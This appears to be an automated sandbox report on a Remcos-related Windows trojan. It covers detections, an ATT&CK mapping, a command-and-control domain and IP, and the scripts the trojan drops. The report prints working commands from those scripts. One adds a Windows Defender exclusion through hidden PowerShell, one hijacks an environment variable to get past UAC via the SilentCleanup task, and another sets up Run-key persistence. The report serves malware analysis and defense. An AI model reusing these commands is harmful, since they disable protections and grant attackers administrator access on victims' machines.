Source: mobsync.exe, 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|
Source: logagent.exe, 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: Remcos_Mutex_Inj
Source: logagent.exe, 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov\|

Source: C:\Windows\SysWOW64\logagent.exe	Code function: cmd.exe		14_2_004055EA
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: cmd.exe		28_2_007455EA

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Windows Service1	Access Token Manipulation1	Scripting1	Input Capture11	Account Discovery1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Defacement1
Domain Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder1	Windows Service1	Obfuscated Files or Information2	Credentials In Files2	System Service Discovery1	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection422	Software Packing1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Remote Access Software1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading1	LSA Secrets	System Information Discovery33	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Modify Registry1	Cached Domain Credentials	Security Software Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol11	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection422	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZfigYV6HXd.exe	31%	Virustotal		Browse
ZfigYV6HXd.exe	27%	ReversingLabs	Win32.Trojan.Generic
ZfigYV6HXd.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe	27%	ReversingLabs	Win32.Backdoor.Androm

Unpacked PE Files

Source	Detection	Scanner	Label	Download
32.2.logagent.exe.10590000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
14.0.logagent.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
32.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
28.0.mobsync.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
28.0.mobsync.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
28.0.mobsync.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
32.0.logagent.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
28.0.mobsync.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.logagent.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.logagent.exe.10590000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
32.0.logagent.exe.10590000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
28.2.mobsync.exe.740000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
28.2.mobsync.exe.10590000.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
32.0.logagent.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.2.logagent.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
32.0.logagent.exe.10590000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.0.logagent.exe.10590000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
14.2.logagent.exe.10590000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
trapboijiggy.dvrlists.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
trapboijiggy.dvrlists.com	31.3.152.100	true	false	high
onedrive.live.com	unknown	unknown	false	high
l5d8cg.sn.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
trapboijiggy.dvrlists.com	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.3.152.100	trapboijiggy.dvrlists.com	Sweden		51430	ALTUSNL	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	488388
Start date:	22.09.2021
Start time:	22:01:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ZfigYV6HXd (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@23/10@42/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.7% (good quality ratio 39.7%) Quality average: 83.1% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 98% Number of executed functions: 30 Number of non-executed functions: 293
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56, 13.107.42.13, 13.107.42.12, 20.82.209.183, 40.112.88.60, 20.82.210.154, 80.67.82.235, 80.67.82.211, 20.50.102.62 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:02:27	API Interceptor	2x Sleep call for process: ZfigYV6HXd.exe modified
22:02:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm C:\Users\Public\Libraries\mlzcjkK.url
22:02:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kkjczlm C:\Users\Public\Libraries\mlzcjkK.url
22:03:09	API Interceptor	2x Sleep call for process: Kkjczlm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\KDECO.bat Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Reputation:	unknown
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1017856
Entropy (8bit):	6.210047247943823
Encrypted:	false
SSDEEP:	12288:FYfGUHuv5bSkBsFkT5m3GpOAz1DeoAdrL7i:FYOUUtBs2YqO8ArPi
MD5:	1A1A9B3969ABCD2FCCD2C6CE20BE68AC
SHA1:	4AA438483D23766F72BA0F4E2BCCB2DD30689845
SHA-256:	80B539D191E840C8F421B2A1C34DCDD34961675D43D678D08B55D17F1E97FC63
SHA-512:	865CF4ACA0E9561F83F102B0F97844F17DB6DA911ACBCFB5112026809A8241008FCE36EE4D546A13747AAA910A278CEAE2C8BE2ABB79522C1C4AF97A5FE008A9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................x.............@..............................................@..............................x#.......R...................0...g........................... ......................................................CODE................................ ..`DATA....x...........................@...BSS.....m................................idata..x#.......$..................@....tls.....................................rdata....... ......................@..P.reloc...g...0...h..................@..P.rsrc....R.......R...6..............@..P....................................@..P........................................................................................................................................

C:\Users\Public\Libraries\mlzcjkK.url Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Kkjczlm\\Kkjczlm.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	96
Entropy (8bit):	4.923940501696146
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMO7OPGhEysGKd6ov:HRYFVmTWDyzh5EysbDv
MD5:	AACA35EE81385686A35CBABFB1DAFA94
SHA1:	5EDA4BEE9BF9E762DB899F9686AF6482DFD48DB1
SHA-256:	A416DF31769CBEC14D15EF6F87615F26C1B684A188C6EF575D14CF398D886033
SHA-512:	877A2FDFAA19546FFDE6A433C11B2952190BB3C59C1DE0EB7752C41CC19DB1733E718DA9135A597CFBA7ABAF6C891466FBDF7FADFA84B163AF40FEEB75F3215D
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\mlzcjkK.url, Author: @itsreallynick (Nick Carr)
Reputation:	unknown
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Kkjczlm\\Kkjczlm.exe"..IconIndex=2..

C:\Users\Public\Trast.bat Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.314972767530033
Encrypted:	false
SSDEEP:	3:LjTnaHF5wlM:rnaHSM
MD5:	4068C9F69FCD8A171C67F81D4A952A54
SHA1:	4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256:	24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512:	A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious:	false
Reputation:	unknown
Preview:	start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.865356627324657
Encrypted:	false
SSDEEP:	6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5:	EAF8D967454C3BBDDBF2E05A421411F8
SHA1:	6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256:	F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512:	FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious:	false
Reputation:	unknown
Preview:	reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\nest Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:yn:W
MD5:	77867F45FFB88FD5F4E38ABBC7D47E0C
SHA1:	7CD5431C381F0EA2A93DF5F6186F320573AABF51
SHA-256:	EC1C5E0981130CC4258BD30385F54BCE775205F658DFAEB085188E7F0B9F6C8B
SHA-512:	F191A8DF3F0350319815237D6D189B830E3DE99AD4FCF3D13D9C05C56E9CB097E4ED129E98550285E9C00893407483AF948B450233C2850D356C2D5D12D925C7
Malicious:	false
Reputation:	unknown
Preview:	Kkjczlm..

C:\Users\Public\nest.bat Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	53
Entropy (8bit):	4.263285494083192
Encrypted:	false
SSDEEP:	3:LjT9fnMXdemzCK0vn:rZnMXd1CV
MD5:	8ADA51400B7915DE2124BAAF75E3414C
SHA1:	1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
SHA-256:	45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
SHA-512:	9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
Malicious:	false
Reputation:	unknown
Preview:	start /min reg delete hkcu\Environment /v windir /f..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\Kkjczlmayclzjlniqyuemyubilsdhtk[2] Download File
Process:	C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998394973689219
Encrypted:	true
SSDEEP:	24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
MD5:	D98F519CB11BC5AAC475F4C0E4BDCA82
SHA1:	6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
SHA-256:	0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
SHA-512:	8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L\|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...\|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.\|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.\|4Q..B\|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.\|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\Kkjczlmayclzjlniqyuemyubilsdhtk[1] Download File
Process:	C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998394973689219
Encrypted:	true
SSDEEP:	24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
MD5:	D98F519CB11BC5AAC475F4C0E4BDCA82
SHA1:	6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
SHA-256:	0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
SHA-512:	8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L\|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...\|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.\|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.\|4Q..B\|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.\|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Kkjczlmayclzjlniqyuemyubilsdhtk[2] Download File
Process:	C:\Users\user\Desktop\ZfigYV6HXd.exe
File Type:	data
Category:	dropped
Size (bytes):	844800
Entropy (8bit):	7.998394973689219
Encrypted:	true
SSDEEP:	24576:G3uO68rue47sNnvwP0N8AkGZ5ut74t8Ld/xUjdqJ3:S16Y1NvwsN6destxUj0l
MD5:	D98F519CB11BC5AAC475F4C0E4BDCA82
SHA1:	6894D2C17C83FB6FF202D2460395FB5BD0EC7A61
SHA-256:	0CB64ABDA5ED26EF559E42D02BBE1A49BB6A380AC42494A5A346E01A1C1BDB3E
SHA-512:	8E271AFE926962EA3D2CCE2E00038592DED897B676B5E1597803BEE184BA265D2B5D84192BABBC33E65EFF74CAC0CFE5CD61AB3C092A86A4ACCDF9A9DCF886F3
Malicious:	false
Reputation:	unknown
Preview:	...].~.g.a.........3?Y.% ...s...0.d(.<...H.@.N..f..[.....=U.MxW...))...U...`!....Q.f..d.e.Im..W..."...j6.>..a.6.~c..y.&..S...?Y........H.@.N..f..[......!~.;.........[..jn..N.....q....D.u....8.ha.:.._..^-j`x...;.;u..{....`u.N.Thc."..%s..q.1lbs.....%.C.)F...G..2......^N.G[..jn..N.....q....D.u....8...K .&.3m....a.F..6..va..S......?6.G8..f}../....rfz..=pt}.K..3[..0.Q>l..M.>Jk2?..v....>Y...L\|..M..n.g/.\. .i,%.b.r.......Nt..k#...W.W...w.`$...~O.G.d...3.H.!7.f...9.P.N[(.LJR0.x...#..A.29.:LsI.E..>S...\|........`..`..-...k%...{\.?...!....-.A..i/.V.......U.X..h.)...C.+.b.>Li7..l..Dq\.8^..~.k;.1.I.Pv.4G.k".p..(....I.t...R...HwW..De..wPw......#...x.NsA..].e/.Y.\|.&#....a'...}x.yW..v.:Fc"...k"..o].^.l.a'.qT..Lk3./.n.,1.+....d.<G.4K.~.\|4Q..B\|.#.x....X.....G.E..uV...{Z.`.....Fn.K..8U.\|.'..qY...Q..."..._...p...{V....z.G.......'.:Jj.<V.{@Q...{@O.I..c.........X.?...... .m>T.r.p..k%.z....BNIBHi7....8..*'..>..J{C..`.Z....k.n./..B...M.>^.r..E.Pv....y^.i.#..J

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.210047247943823
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	ZfigYV6HXd.exe
File size:	1017856
MD5:	1a1a9b3969abcd2fccd2c6ce20be68ac
SHA1:	4aa438483d23766f72ba0f4e2bccb2dd30689845
SHA256:	80b539d191e840c8f421b2a1c34dcdd34961675d43d678d08b55d17f1e97fc63
SHA512:	865cf4aca0e9561f83f102b0f97844f17db6da911acbcfb5112026809a8241008fce36ee4d546a13747aaa910a278ceae2c8be2abb79522c1c4af97a5fe008a9
SSDEEP:	12288:FYfGUHuv5bSkBsFkT5m3GpOAz1DeoAdrL7i:FYOUUtBs2YqO8ArPi
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	8aa2b2b2a2ead4ca

Static PE Info

General
Entrypoint:	0x45d078
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	91a12f22e7f2305a107edddf42c40880

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045CE78h
call 00007F8C4CBB42E5h
nop
nop
nop
nop
mov eax, dword ptr [004EBEE4h]
mov eax, dword ptr [eax]
call 00007F8C4CC01399h
mov ecx, dword ptr [004EC070h]
mov eax, dword ptr [004EBEE4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045CAD8h]
call 00007F8C4CC01399h
mov eax, dword ptr [004EBEE4h]
mov eax, dword ptr [eax]
call 00007F8C4CC0140Dh
call 00007F8C4CBB2070h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xee000	0x2378	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfa000	0x5200	.rsrc
